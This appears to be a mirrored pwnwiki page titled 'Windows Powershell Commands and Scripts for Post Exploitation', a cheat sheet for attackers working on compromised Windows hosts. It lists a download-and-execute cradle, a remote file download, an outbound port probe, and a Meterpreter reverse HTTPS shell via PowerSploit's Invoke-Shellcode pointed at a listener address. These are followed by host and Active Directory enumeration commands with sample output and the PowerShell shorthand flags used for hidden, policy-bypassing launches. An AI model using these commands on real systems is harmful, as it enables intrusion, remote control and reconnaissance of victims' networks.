weyne/pwnwiki.github.io

Fork 0

mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00

Rob Fuller 6373be6e56 add powershell shorthand reference

2014-01-30 09:14:35 -05:00

8.8 KiB

Raw Blame History

Windows Powershell Commands and Scripts for Post Exploitation

One liners

Download and Execute Remote Powershell Script

iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")

Download and Save File

(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')

Enumerate Allowed Outbound Ports 1-1024 via securitypadawan.blogspot.com

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); 
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Reverse Shell Using PowerSploit's Invoke-Shellcode

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force

Commands with Sample Output

Hardware

Get BIOS Information

Command with arguments: gwmi win32_bios
Description: Retrieves BIOS information including system serial number.
Output:
- **Windows 7:** Show/Hide
  PS C:\Users\johndoe> gwmi win32_bios SMBIOSBIOSVersion : 6.00 Manufacturer : Phoenix Technologies LTD Name : PhoenixBIOS 4.0 Release 6.0 SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc Version : INTEL - 6040000

Get Drive Information

Command with arguments: [System.IO.DriveInfo]::GetDrives()
Output:
- **Windows 7:** Show/Hide
  PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives() Name : C:\ DriveType : Fixed DriveFormat : NTFS IsReady : True AvailableFreeSpace : 55568087552 TotalFreeSpace : 55568087552 TotalSize : 159876850304 RootDirectory : C:\ VolumeLabel : Name : D:\ DriveType : CDRom DriveFormat : IsReady : False AvailableFreeSpace : TotalFreeSpace : TotalSize : RootDirectory : D:\ VolumeLabel : Name : G:\ DriveType : Removable DriveFormat : IsReady : False AvailableFreeSpace : TotalFreeSpace : TotalSize : RootDirectory : G:\ VolumeLabel : Name : V:\ DriveType : Network DriveFormat : NTFS IsReady : True AvailableFreeSpace : 259182640616 TotalFreeSpace : 259182640616 TotalSize : 827361812256 RootDirectory : V:\ VolumeLabel : TestMappedDrive

User Information

Display Username, SID, Last Used

Command with arguments: gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
Description: Retrieves information about system users.
Output:
- **Windows 7:** Show/Hide
  PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto Name SID LastUseTime localpath ---- --- ----------- --------- WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe WIN-244VDGE5OGH S-1-5-20 C:\Windows\ServiceProfiles\Netwo... WIN-244VDGE5OGH S-1-5-19 C:\Windows\ServiceProfiles\Local... WIN-244VDGE5OGH S-1-5-18 C:\Windows\system32\config\syste...

Translate SID to Username

Command with arguments: ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value
Output:
- **Windows 7:** Show/Hide
  PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280- 1000")).translate([System.Security.Principal.NTAccount])).value WIN-244VDGE5OGH\johndoe

Using the PowerShell Active Directory Modules

Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/

Setting Credentials

Command with arguments: $cred = Get-Credential
Description: Stores valid credentials in the $cred variable for use with the Active Directory Modules.
Notes: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)

Query to List "Domain Admins"

Command with arguments: Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"
Output:
- **Windows 7:** Show/Hide
  distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com name : Administrator objectClass : user objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db SamAccountName : Administrator SID : S-1-5-21-2027135834-1792351174-2509185371-500

Enumerate All Servers on Domain

Command with arguments: Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name
Output:
- **Windows 7:** Show/Hide
  name ---- PWNT-DC

Exchange1 SharePoint1

Powershell CLI short hand:

PowerShell.exe

Parameter - Shortcut(s)

Command - c
EncodedArguments - ea, encodeda
EncodedCommand - e,ec
ExecutionPolicy - ex,ep
File - f
Help - -h,-? or /h,/?
InputFormat - i,if
NoExit - noe
NoLogo - nol
NoProfile - nop
NonInteractive - noni
OutputFormat - o,of
Sta - s
WindowStyle - w

powershell_ise.exe